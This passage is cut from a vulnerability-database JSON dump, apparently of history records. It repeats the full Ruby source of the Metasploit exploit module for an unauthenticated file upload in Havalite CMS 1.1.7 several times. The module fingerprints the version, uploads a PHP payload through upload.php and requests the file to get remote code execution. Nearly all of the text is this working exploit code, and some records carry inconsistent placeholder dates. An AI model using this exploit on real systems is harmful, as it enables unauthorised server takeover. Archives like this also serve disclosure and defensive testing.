type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-25T08:56:38", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-02-25T12:54:32", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-02-25T12:54:32", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-02-25T12:54:32", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-03T13:00:11", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-03T13:00:11", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-03T13:00:11", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-03T14:57:52", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-03T14:57:52", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-03T14:57:52", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T07:03:42", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-12T07:03:42", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-12T07:03:42", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T11:07:49", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-12T11:07:49", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-12T11:07:49", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-16T01:52:22", "history": [], "viewCount": 1, "enchantments": {"score": {"modified": "2018-03-16T01:52:22", "value": 6.0}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-03-16T01:52:22", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
